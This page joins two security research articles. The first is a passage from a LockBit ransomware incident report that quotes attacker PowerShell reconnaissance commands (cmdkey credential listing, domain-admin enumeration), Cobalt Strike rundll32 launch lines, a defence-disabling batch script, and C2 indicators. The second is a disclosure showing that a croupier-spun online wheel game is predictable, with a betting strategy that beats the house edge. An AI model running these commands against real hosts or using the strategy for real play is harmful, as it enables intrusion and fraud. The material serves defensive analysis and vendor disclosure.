  • powershell /c nltest /dclist: ; nltest /domain_trusts ; cmdkey /list ; net group 'Domain Admins' /domain ; net group 'Enterprise Admins' /domain ; net localgroup Administrators /domain ; net localgroup Administrators ;
  • powershell /c Get-WmiObject win32_service -ComputerName localhost | Where-Object {$_.PathName -notmatch 'c:\\win'} | select Name, DisplayName, State, PathName | findstr 'Running' 

Persistence

A persistence mechanism was installed by SocGholish using the startup folder of the infected user to ensure execution at user logon. The shortcut file C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VGAuthService.lnk was created and configured to execute the following command which will run the Cobalt Strike beacon deployed to the host:

C:\ProgramData\VGAuthService\VGAuthService.exe C:\ProgramData\VGAuthService\VGAuthService.dll,DllRegisterServer

Defence Evasion

Deployment of a batch script named 123.bat was observed on multiple hosts and was deployed via PsExec. The script possessed the capabilities to uninstall Sophos, disable Windows Defender and terminate running services where the service name contained specific strings. The contents of the batch script are provided below:

Figure1: 123.bat contents

The ransomware binary used also clears key Windows event log files including Application, System and Security. It also prevents any further events from being written by targeting the EventLog service.

Discovery

Bloodhound was executed days after the initial SocGholish infection on the patient zero host. The output file was created in the C:\ProgramData\ directory and had the file extension .bac instead of the usual .zip, however this file was still a zip archive.  

A TGS ticket for a single account was observed on patient zero in a text file under C:\ProgramData\. It appears the threat actor was gathering TGS tickets for SPNs associated with the compromised user.

Seatbelt [2] was also executed on the patient zero host alongside Bloodhound. Security-orientated information about the host gathered by Seatbelt was outputted to the file C:\ProgramData\seat.txt.

Lateral Movement

The following methods were utilized to move laterally throughout the victim network:

  • Cobalt Strike remotely installed temporary services on targeted hosts which executed a Cobalt Strike beacon. An example command line of what the services were configured to run is provided below:

    rundll32.exe c:\programdata\svchost1.dll,DllRegisterServer
  • RDP sessions were established using a high privileged account the threat actor had compromised prior.

Collection

7zip was deployed by the adversary to compress and stage data from folders of interest which had been browsed during RDP sessions.

Command and Control

Cobalt Strike was the primary C2 framework utilized by the threat actor to maintain their presence on the estate as well as laterally move.

Exfiltration Using MegaSync

Before deploying the ransomware to the network, the threat actor began to exfiltrate data to Mega, a cloud storage provider. This was achieved by downloading Mega sync software onto compromised hosts, allowing for direct upload of data to Mega.

Impact

The ransomware was pushed out to the endpoints using PsExec and impacted both servers and end-user devices. The ransomware executable was named zzz.exe and was located in the following folders:

  • C:\Windows\
  • C:\ProgramData\
  • C:\Users\<user>\Desktop\

Recommendations

  1. Ensure that both online and offline backups are taken and test the backup plan regularly to identify any weak points that could be exploited by an adversary.
  2. Restrict internal RDP and SMB traffic so that only hosts that are required to communicate via these protocols are allowed to.   
  3. Monitor firewalls for anomalous spikes in data leaving the network.
  4. Block traffic to cloud storage services such as Mega which have no legitimate use in a corporate environment.
  5. Provide regular security awareness training.

If you have been impacted by LockBit, or currently have an incident and would like support, please contact our Cyber Incident Response Team on +44 161 209 5148 or email [email protected]

Indicators of Compromise

IOC Value Indicator Type Description
orangebronze[.]com Domain Cobalt Strike C2 server
194.26.29[.]13 IP Address Cobalt Strike C2 server
C:\ProgramData\svchost1.dll C:\ProgramData\conhost.dll C:\ProgramData\svchost.dll File Path Cobalt Strike beacons
C:\ProgramData\VGAuthService\VGAuthService.dll File Path Cobalt Strike beacon deployed by SocGholish
C:\Windows\zzz.exe C:\ProgramData\zzz.exe C:\Users\<user>\Desktop\zzz.exe File Path Ransomware Executable
c:\users\<user>\appdata\local\megasync\megasync.exe File Path Mega sync software
C:\ProgramData\PsExec.exe File Path PsExec
C:\ProgramData\123.bat File Path Batch script to tamper with security software and services
D826A846CB7D8DE539F47691FE2234F0FC6B4FA0 SHA1 Hash C:\ProgramData\123.bat
Figure 2: Indicators of Compromise

MITRE ATT&CK®

Tactic Technique ID Description
Initial Access Drive-by Compromise T1189 Initial access was gained via infection of SocGholish malware caused by a drive-by-download
Execution Command and Scripting Interpreter: Windows Command Shell T1059.003 A batch script was utilized to execute malicious commands
Execution Command and Scripting Interpreter: PowerShell T1059.001 PowerShell was utilized to execute malicious commands
Execution System Services: Service Execution T1569.002 Cobalt Strike remotely created services to execute its payload
Execution System Services: Service Execution T1569.002 PsExec creates a service to perform it’s execution
Persistence Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 SocGholish established persistence through a startup folder 
Defence Evasion Impair Defenses: Disable or Modify Tools T1562.001 123.bat disabled and uninstalled Anti-Virus software
Defence Evasion Indicator Removal on Host: Clear Windows Event Logs T1070.001 The ransomware executable cleared Windows event log files
Discovery Domain Trust Discovery T1482 The threat actor executed Bloodhound to map out the AD environment
Discovery Domain Trust Discovery T1482 A TGS ticket for a single account was observed in a text file created by the threat actor
Discovery System Information Discovery T1082 Seatbelt was ran to gather information on patient zero
Lateral Movement SMB/Admin Windows Shares T1021.002 Cobalt Strike targeted SMB shares for lateral movement
Lateral Movement Remote Services: Remote Desktop Protocol T1021.001 RDP was used to establish sessions to other hosts on the network
Collection Archive Collected Data: Archive via Utility T1560.001 7zip was utilized to create archives containing data from folders of interest
Command and Control Application Layer Protocol: Web Protocols T1071.001 Cobalt Strike communicated with its C2 over HTTPS
Exfiltration Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 The threat actor exfiltrated data to Mega cloud storage
Impact Data Encrypted for Impact T1486 Ransomware was deployed to the estate and impacted both servers and end-user devices
  1. https://www.bleepingcomputer.com/news/security/conti-ransomware-finally-shuts-down-data-leak-negotiation-sites/
  2. https://github.com/GhostPack/Seatbelt

Wheel of Fortune Outcome Prediction – Taking the Luck out of Gambling

16 August 2022 at 19:50

Authored by: Jesús Miguel Calderón Marín

Introduction

Two years ago I carried out research into online casino games specifically focusing on roulette. As a result, I composed a detailed guide with information on classification of online roulette, potential vulnerabilities and the ways to detect them[1].

Although this guideline was particularly well-received by the security community, I felt that it was too theoretical and lacked a real-world example of a vulnerable casino game.
With this, I decided to carry out research on a real casino game in search of new vulnerabilities and exploit techniques. In case of success, I planned to share the results with the affected vendor[2] and afterwards with the community.

While I was looking for a target I had a look on a particular variant of the casino game ‘Wheel of fortune’. The wheel is spun manually by a croupier and not by any automated system. That caught my eye and made me think about the randomness of the winning numbers. Typically, pseudo random number generators (PRNGs) are one of the main targets when it comes to game security assessments. However, there is no a PRNG in this case. Apparently, the randomness relies on the number of times the croupier spins the wheel, which, in turn, depends on their arm strength among other properties. The question that immediately came to my mind was whether a croupier is a good ‘PRNG’?

Summary

IMPORTANT NOTE. For security reasons and in order to keep confidential the identity of the vendor and game affected, some data has been redacted or omitted and the name of the game was changed to a generic one (Big Six). In addition, screenshots of the real wheel and croupiers have been substituted by similar images specially created for this purpose.

Bix Six is a casino game based on Wheel of Fortune game. Briefly, it is a big vertical wheel where the player bets on the number it will stop on [3].

According to this security analysis, the outcome of the Big Six game is predictable enough in order that the house edge could be overcome and consequently a profit could be made in the long run. Generally speaking, croupiers unconsciously tend to spin the wheel a specific number of times hence the dispersion of the number of spins is too small. Consequently, some positions of the wheel had higher chances of winning and a player could benefit by betting on these positions.

Table of Contents

The rules

The wheel is comprised of 54 segments. The possible outcomes on the wheel are 1, 2, 5, 10, 20, 40, multiplier 1 (M1) and multiplier 2 (M2).

Figure 1 – Bix Six Wheel

Players bet on a number they think the wheel will land on and then the croupier spins the wheel. The bets must be placed within the table limits, which are shown on the screen. The colour around the countdown indicates when players can place bets (green), when betting time is nearly over (amber) and when no further bets can be placed for the current round (no countdown).

Figure 2 – Phases of the betting round

It is worth mentioning that the croupier starts spinning the wheel before the betting time is over and continues doing it for several seconds once the betting time is over and the betting panel is no longer available.

Some spins after, the winning number is determined and pay-outs are made on winning bets.

Figure 3 – Winning segment indicated by the leather pointer at the top of the wheel

Odds and pay-outs

The wheel can stop on the numbers 1, 2, 5, 10, 20 and 40. The pay-out of each segment is a bet multiplied by its number plus the stake. For example, if a player bets 15 pounds on number 10 and this turns out to be the winning number, the player is paid 165 pounds (15 x 10 + 15).

The segments M1 and M2 are multiplier segments, which makes the game more interesting. If the wheel stops on any of them, new bets are not accepted, and the wheel is spun again. However, any wins on the next spin are multiplied by [*REDACTED*] or [*REDACTED*], according to the multiplier the wheel stops on in the original spin. If the wheel stops on two or more multipliers, the final win is increased by as many times as all the multipliers before indicate.

The table below shows the number of stops, pay-out and house edge for each possible outcome:

Table 1 – Odds and pay-outs

Wheel tracker

A script was developed to record the behaviour and the outcome of the Bix Six online game. The obtained data included inter alia, initial speeds of the wheel, croupiers and winning numbers.

7,278 hands were recorded in April 2021 and subsequently analysed. The figures below show some of those hands.

Figure 4 – Tracked hands

Among most relevant data for analysis, the following is included:

  • winningNumber – the winning number displayed on the wheel as an outcome of every hand (1, 2, 5, 10, 20, 40, M1, o M2).
Figure 5 – Winning Number ‘2’
  • AbsolutePosition – unique number to identify unambiguously every segment. E.g. the yellow segment has the absolute position 0. This does not vary from hand to hand unlike relative positions (see the definition below).
Figure 6 – Segments’ identifiers (absolute positions 0, 18, 30, 43)
  • winningAbsolutePosition – the absolute position of the segment of the winning number. The following picture shows the winning number 40, which has the absolute position 0.
Figure 7 – Winning Absolute Position ‘0’
  • direction – the direction in which the wheel is spun. The value assigned to it is whether ‘CLOCKWISE’ or ‘ANTICLOCKWISE’.
  • positions_run – identical to the number of the wheel spins multiplied by 54 (the number of segments the wheel is divided into). For instance, if the wheel spins 1.5 times, the value of this variable will be 81 (1.5 * 54).
  • HAND_TIME (Initial position) – The moment in the video when the hand starts (e.g. 35.2 seconds from the beginning of the recording). This coincides with the instant before the betting panel is disabled and no longer available until the next game (specifically 0.5 seconds before). The position of the wheel at this moment will be referred to as the initial position from now on.
Figure 8 – Initial position – instant before the betting panel is disabled
Figure 9 – Instant when the betting panel is disabled
  • Relative positions – unique numbers to identify the segments of the wheel which are assigned at the initial position beginning from the segment on the top (position 1), followed by the next segment (position 2), etc. The next segment is on its left if the direction is clockwise or on its right if the direction is anticlockwise.
Figure 10 – Relative positions assigned at the initial position
  • winningRelativePosition – defines the relative position of the segment containing the winning number. It can be calculated using the following formula: round(positions_run % 54, 0) + 1. E.g. in the figures below, the blue segment that is in the relative position number 10 is the winning one. Therefore, the winning relative position is 10 for this hand.
Figure 11 – Initial position – Relative positions
Figure 12 – Final position – Winning relative position ‘10’

Wheel behaviour analysis

The values of the variables ‘winningAbsolutePosition’, ‘winningNumber’ and ‘winningRelativePosition’ have been analysed to establish the fact that they are random. In order to do this, the chi-square test of independence have been used to ascertain whether the difference between the analysed numbers distribution and the expected distribution is attributed to good luck or, on the contrary, to the lack of randomness, which could be eventually exploited by a malicious player. Should any further information about the method be required, the reference added to this document could be consulted [1][2].

Variables winningNumber and winningAbsolutePosition

The variables ‘winningNumber’ and ‘winningAbsolutePosition’ have successfully passed the test. Particularly, in case of ‘winningNumber’ the chi-squared statistic was 4.48. The critical value for the distribution chi-square with 7 degrees of freedom and the level of significance of 1% is 18.47[3]. As the critical value is significantly higher than chi-squared statistic (4.48), it is impossible to state that winning numbers are not random.

Similarly, the statistics for ‘winningAbsolutePosition’ was 32.18, which is much less than the critical value 79.84 (53 degrees of freedom and a level of significance of 1%). This implies that it cannot be stated that there is difference in size of the segments or the wheel is biased.

Variable winningRelativePosition

However, as for the parameter ‘winningRelativePosition’, it is notable that some positions win more frequently than others do, which could make it possible for a player to overcome the house edge and benefit from it. According to the collected data, the chi-squared statistic is 90.75 and exceeds the critical value 79.84 (53 degrees of freedom and a level of significance of 1%). In addition, the p-value (probability of obtaining test results at least as extreme as the results actually observed) [4] is 0.095%. These results suggest that the parameter ‘winningRelativePosition’ is far from being random.

Table 2 – Chi Squared – winningRelativePosition

The table below shows that p-value is even lower in winning relative positions for hands with clockwise direction, particularly 0.00000014%.

Table 3 – Chi Squared – winningRelativePosition – Clockwise

Simultaneous confidence intervals [5][6] were calculated for this last sample to ultimately know the maximum and minimum potential benefit which a player would be able to gain. In order to work this out, the Wilson score method was used with a confidence level of 90%.

It was estimated that a player has a probability of 2.15% of winning betting on the position 29 in the worst of cases. This probability considerably exceeds the expected value (1.851%) and implies a significant advantage for the player.

Table 4 -Confidence Intervals (Wilson method – 90% confidence) for winning relative positions – CLOCKWISE

Exploiting lack of randomness on winning relative positions

In order to exploit the lack of randomness of winning relative positions, betting strategies have to be designed. The following two sections include betting strategies designed for clockwise and anticlockwise games, and the analysis of their efficiency in comparison with other strategies.

Betting Strategies

A very simple winning betting strategy consists in betting on number 40 if the segment (there is only one segment with number 40) is in the relative position 29 and the wheel direction is clockwise. The following shows an example of how this strategy works. 

The image below shows the initial position of the wheel (this coincides with the instant before the betting panel is disabled and no longer available until the next game). Number 40 is in the relative position 8 but not in the relative position 29. Therefore, this game would be ignored, and no bets should be made.

Figure 13 – Initial position – Segment 40 is on the relative position 8

In the following initial position, number 40 is in the relative position 29. Therefore, a bet should be made on number 40.

Figure 14-  Initial position – Segment 40 is on the relative position 29

It is worth mentioning that the bets would need to be made in an automated way using a script because such tasks as identifying the number positioned in a specific relative position, and making (or not making) a bet within 0.5 seconds, are not possible to do manually.

According to the simultaneous confidence intervals calculated previously, the probability of winning would be between 2.15% and 3.01% (without taking into account the M2 and M1 segments), which considerably exceeds the expected value (1/54 = 0.0185 = 1.85%).

Taking into account the aforementioned probabilities and assuming that:

  • the wheel stops on the segments ‘M1’ and ‘M2’ with probabilities 1.9% and 1.4% in the worst of the cases, and 2.71% and 2.12% in the best of the cases.
  • all the segments have equal probability of winning if previously the wheel stopped on ‘M2’ or ‘M1’
  • the size of the bet is always 1€ and the winning quantity limit is 500.000€

it was estimated that the player could obtain a return on betting that would range from 0.56% to 41.80% using this strategy. For instance, a player would win a minimum of 5.6€ and a maximum of 418€ per every 1000€ bet, with approximately 90% of confidence.

Notably, this strategy might require long time to obtain a ‘worthy’ benefit as most of the games are discarded because bets are only placed when number 40 is in the relative position 29.

As a proof of concept, a more complex betting strategy was designed based on the estimated probabilities and expected ROI. It will be referred to as ‘MY BETTTING STRATEGY’ from now on.

Table 5 – My betting strategy

Depending on the direction (CLOCKWISE and ANTICLOCKWISE), the strategies are different.

The columns ‘BEST NUMBER TO BET ON’ contain the numbers which the player should bet on and the columns ‘RELATIVE POSITION OF NUMBER 40’ indicate the relative position of number 40.

For example, if the wheel is spinning clockwise and the relative position of the segment 40 is 7 (see the image below), the player should not bet on any number.

Figure 15 – Initial position – Segment 40 is on the relative position 7

However, if the wheel is spinning clockwise and the relative position of the segment 40 is 39, the player should bet on number 10 according to the strategy (see the following image and table).

Figure 16 – Initial position – Segment 40 is on the relative position 39
Table 6 – Excerpt from the ‘My betting strategy’ table

Analysing the effectiveness of betting strategies

A computer simulation of a fictitious player following ‘MY BETTING STRATEGY’ described in the previous section was run using the sample of 7.278 games (Figure 4 – Tracked hands).

For the simulation, it was assumed that:

  • all the segments have equal probability of winning if previously the wheel stopped on ‘M2’ or ‘M1’
  • as the winning numbers after the wheel stopping on ‘M2’ and ‘M1’ were not tracked by the script, the expected ROI was returned when the ‘winning segment’ was either ‘M2’ or ‘M1’. For instance, if following the strategy one euro is bet is on number 10 and the wheel stops on the segment ‘M2’, the total balance will be increased by [*REDACTED*] as this quantity is the expected ROI over the long run.
  • the size of the bet is always 1€ and the winning quantity limit is 500.000€

 The following table shows the results:

Table 7 – ROI of ‘My betting strategy’

Noticed that not all the games were played. E.g. for the ‘CLOCKWISE’ direction, 1,102 out of 3,646 games were played, which means that 2,544 were ignored, as they were not profitable according to the strategy.

The balance shows the winnings (positive in both cases) and the column ‘ROI’ indicates the average money per played hand, which the player made. In other words, ROI = 100 * ‘BALANCE’ / ‘GAMES PLAYED’.

In order to determine the effectiveness of the betting strategy, the probability of obtaining a return greater than or equal to the returns obtained was worked out. Specifically, a bootstrap[7] analysis was performed to estimate the distribution of returns for the following losing strategies:

  • RANDOM strategy consists in betting on any number (1, 2, 5, 10, 20 or 40) randomly.
  • ALWAYS 10 strategy consists in always betting on number 10. This is a very interesting strategy to compare with ‘MY BETTING STRATEGY’, as number 10 has the lowest house edge among all the numbers, [*REDACTED*]% (see Odds and pay-outs). Therefore, ‘ALWAYS 10’ strategy is supposed to be the best strategy as it allows minimising the losses per hand.

It is worth mentioning that Monte Carlo[8] analysis was performed as well, which yielded very similar results.

The following table shows the results of the analysis:

Table 8 – Results of the comparison between the strategies ‘RANDOM’, ‘ALWAYS 10’ and ‘MY BETTING STRATEGY’

As it can be observed, the probability of obtaining a return greater than or equal to ‘MY BETTING STRATEGY’ with the ‘random’ and ‘always 10’ betting strategies (across 1,102 and 303 games respectively) is less than 1%. This result suggests that the high effectiveness of ‘MY BETTING STRATEGY’ is far from being by luck.

The following graphs visually illustrate the effectiveness of ‘MY BETTING STRATEGY’ for the CLOCKWISE direction in comparison with the ‘random’ and ‘always 10’ betting strategies. A thousand games were simulated.

Figure 17 – MY BETTING STRATEGY vs ALWAYS 10 strategy
Figure 18 – MY BETTING STRATEGY strategy vs RANDOM strategy

It is noteworthy that better strategies could be worked out. However, they were not explored as exploiting the lack of randomness in an efficient way was not the aim of this analysis but highlighting the fact that the house edge could be overcome.

Other Considerations

It is worth mentioning that no intrusive tests were conducted during this research. Additionally, it was not necessary to make any bets to detect or proof the potential vulnerability described in this document. The interaction with the game was limited to record videos of the wheel, which were analysed afterwards.

Other online games were found to be similar to Bix Six. Therefore, these games might be vulnerable as well.

Recommendations

It is recommended to make the necessary changes to the game in order to generate random winning relative positions. This way, it will not be possible to overcome the house edge and make profit in the long run.

The best and safest solution (probably, the most expensive to implement as well) is to replace the croupiers by hardware that randomly generates the outcome and spins the wheel with the necessary and exact strength to show the previously determined number as the winning number.

Other solution might consist in increasing the difference between the minimum and maximum number of wheel spins. According to the observations, the croupiers currently spin the wheel approximately between 2.7 times (150 segments) and 4.7 times (258 segments). This means a difference of only two wheel spins (4.7 – 2.7 = 2). Additionally, it was observed that the croupiers unconsciously tend to spin the wheel a specific number of times. Particularly, a number between 3.56 and 3.62 times (192.5 – 195.5) as can be seen in the following histogram:

Picture 19 – Number of spins (expressed in number of segments)

Apparently, the fact that this distribution is bell-shaped is the reason why the winning positions are not random enough. Therefore, increasing the difference between the maximum and minimum number of wheel spins will help to flatten the curve and, consequently, to obtain more random winning numbers.

To illustrate this solution, a simulation of 7,200 wheel spins, whose numbers of segments run ranged from 147.5 to 511 (4 wheel spins difference instead of 2), was conducted. Its histogram can be seen in the image below:

Picture 20 – Number of spins (expressed in number of segments)

A chi-square test was conducted, and the p-value obtained was 98.6%. This result conforms well with a fair game and the deviation from expectations is well with the normal range.

Table 9 – Chi Squared – Winning numbers

Alternatively, winnings of players could be monitored and analysed statistically in real time. If a player’s winnings were unlikely to be by chance at a particular time, their accounts could be blocked temporarily and further investigation could be undertaken. Additionally, suspicious betting patterns could be monitored as well. For example, a player betting only on specific numbers (40 and 20) sporadically could be an indicative of a player trying to exploit this issue.

References

[1] Online Casino Roulette – A guideline for penetration testers and security researchers: https://research.nccgroup.com/2020/09/18/online-casino-roulette-a-guideline-for-penetration-testers-and-security-researchers/

[2] NCC Group Vulnerability Disclosure Policy: https://research.nccgroup.com/wp-content/uploads/2021/03/Disclosure-Policy.pdf

[3] Big Six – Wizard of odds: https://wizardofodds.com/games/big-six/

[4] Chi-squared distribution: https://en.wikipedia.org/wiki/Chi-squared_distribution

[5] Goodness of fit: https://en.wikipedia.org/wiki/Goodness_of_fit

[6] Chi Square Distribution Table for Degrees of Freedom 1-100: https://www.easycalculation.com/statistics/chisquare-table.php

[7] P-value – Wikipedia: https://en.wikipedia.org/wiki/P-value

[8] Confidence interval: https://en.wikipedia.org/wiki/Confidence_interval

[9] MultinomCI – Confidence Intervals for Multinomial Proportions: https://rdrr.io/cran/DescTools/man/MultinomCI.html

[10] Bootstrapping – https://en.wikipedia.org/wiki/Bootstrapping_(statistics)

[11] Monte Carlo – https://en.wikipedia.org/wiki/Monte_Carlo_method

❌
❌